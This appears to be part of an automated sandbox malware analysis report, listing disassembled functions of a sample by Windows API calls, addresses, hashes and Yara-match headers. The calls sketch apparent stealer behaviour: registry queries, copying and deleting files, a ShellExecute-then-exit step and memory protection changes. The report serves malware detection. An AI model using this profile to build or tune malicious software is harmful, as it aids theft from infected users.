                                            • Instruction Fuzzy Hash: 6701FFB9A80308BFEB10DFE4DC4AFAEB7B9EB48701F104559FA05A7280D6759A008F51
                                            APIs
                                            • StrStrA.SHLWAPI(007CAEF0,?,?,?,0041140C,?,007CAEF0,00000000), ref: 0041926C
                                            • lstrcpyn.KERNEL32(0064AB88,007CAEF0,007CAEF0,?,0041140C,?,007CAEF0), ref: 00419290
                                            • lstrlenA.KERNEL32(?,?,0041140C,?,007CAEF0), ref: 004192A7
                                            • wsprintfA.USER32 ref: 004192C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpynlstrlenwsprintf
                                            • String ID: %s%s
                                            • API String ID: 1206339513-3252725368
                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                            • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 023E151B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023E1522
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023E153E
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023E155C
                                            • RegCloseKey.ADVAPI32(?), ref: 023E1566
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3225020163-0
                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction ID: 05fcbacfed76d9212f64dfd6274a6ab5114f1b21e2e416fb56ef3328d3b9ec55
                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction Fuzzy Hash: 210131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0697280D6749A018F91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID:
                                            • API String ID: 3466090806-0
                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                            • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                            APIs
                                            • __getptd.LIBCMT ref: 023FC9B5
                                              • Part of subcall function 023FC206: __getptd_noexit.LIBCMT ref: 023FC209
                                              • Part of subcall function 023FC206: __amsg_exit.LIBCMT ref: 023FC216
                                            • __getptd.LIBCMT ref: 023FC9CC
                                            • __amsg_exit.LIBCMT ref: 023FC9DA
                                            • __lock.LIBCMT ref: 023FC9EA
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 023FC9FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                            • Instruction ID: 1a3dd1e216573c8942db26b851b4c927c326d802ac1e006164913b5c8ab2c61d
                                            • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                                            • Instruction Fuzzy Hash: 7FF096729D0718ABDBB0F7A8B402B1E73B2AF04728F10154BDA14A61D0DB255540DF59
                                            APIs
                                            • __getptd.LIBCMT ref: 0041C74E
                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                            • __getptd.LIBCMT ref: 0041C765
                                            • __amsg_exit.LIBCMT ref: 0041C773
                                            • __lock.LIBCMT ref: 0041C783
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                            • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                                            • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                                            • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                                            APIs
                                            • StrCmpCA.SHLWAPI(00000000,0079D570), ref: 0041079A
                                            • StrCmpCA.SHLWAPI(00000000,0079D690), ref: 00410866
                                            • StrCmpCA.SHLWAPI(00000000,0079D5F0), ref: 0041099D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: `_A
                                            • API String ID: 3722407311-2339250863
                                            • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                            • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                            • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                            • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                            APIs
                                            • StrCmpCA.SHLWAPI(00000000,0079D570), ref: 0041079A
                                            • StrCmpCA.SHLWAPI(00000000,0079D690), ref: 00410866
                                            • StrCmpCA.SHLWAPI(00000000,0079D5F0), ref: 0041099D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy
                                            • String ID: `_A
                                            • API String ID: 3722407311-2339250863
                                            • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                            • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                            • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                            • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 023F68CA
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 023F698D
                                            • ExitProcess.KERNEL32 ref: 023F69BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                            • Instruction ID: c5bd38b66703aed79f5e45de6c059f9815f4d35de06aa18275ebe51afb892ad2
                                            • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                            • Instruction Fuzzy Hash: 67314BB5901218ABDB68EF90ED95FDEB77AAF04300F404199E309A6190DF746B88CF59
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                            • ExitProcess.KERNEL32 ref: 00416755
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                            • String ID: <
                                            • API String ID: 1148417306-4251816714
                                            • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                            • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                            • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                            • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: @Jn@$Jn@$Jn@
                                            • API String ID: 544645111-1180188686
                                            • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                            • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                            • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                            • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                            APIs
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcatlstrcpy
                                            • String ID: vI@$vI@
                                            • API String ID: 3905823039-1245421781
                                            • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                            • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                            • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                            • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                            • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                            • wsprintfW.USER32 ref: 00418D78
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocProcesswsprintf
                                            • String ID: %hs
                                            • API String ID: 659108358-2783943728
                                            • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                            • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                            • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                            • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023EA548
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 023EA666
                                            • lstrlen.KERNEL32(00000000), ref: 023EA923
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 023EA094
                                            • DeleteFileA.KERNEL32(00000000), ref: 023EA9AA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                            • Instruction ID: 008bdcc57ce16def99ebd9a79b8e6b435487d6638afdd27021f45468c6d7a3c7
                                            • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                            • Instruction Fuzzy Hash: 31E1C4729102189BCB65FBA4ED91DEE733AAF54300F508159E65AB21A0DF346F4CCF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                            • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                            • String ID:
                                            • API String ID: 257331557-0
                                            • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                            • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                            • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                            • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023ED6E8
                                            • lstrlen.KERNEL32(00000000), ref: 023ED8FF
                                            • lstrlen.KERNEL32(00000000), ref: 023ED913
                                            • DeleteFileA.KERNEL32(00000000), ref: 023ED992
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                            • String ID:
                                            • API String ID: 211194620-0
                                            • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                            • Instruction ID: 7e3a753aaf72c46cd0fb85ba9006c650db25bc59d322e2064bfb66a9fc7ed30a
                                            • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                            • Instruction Fuzzy Hash: 2391F4729102189BCF68FBA4ED65DEE733AAF54300F504169E61AB6190EF346B4CCF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                            • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
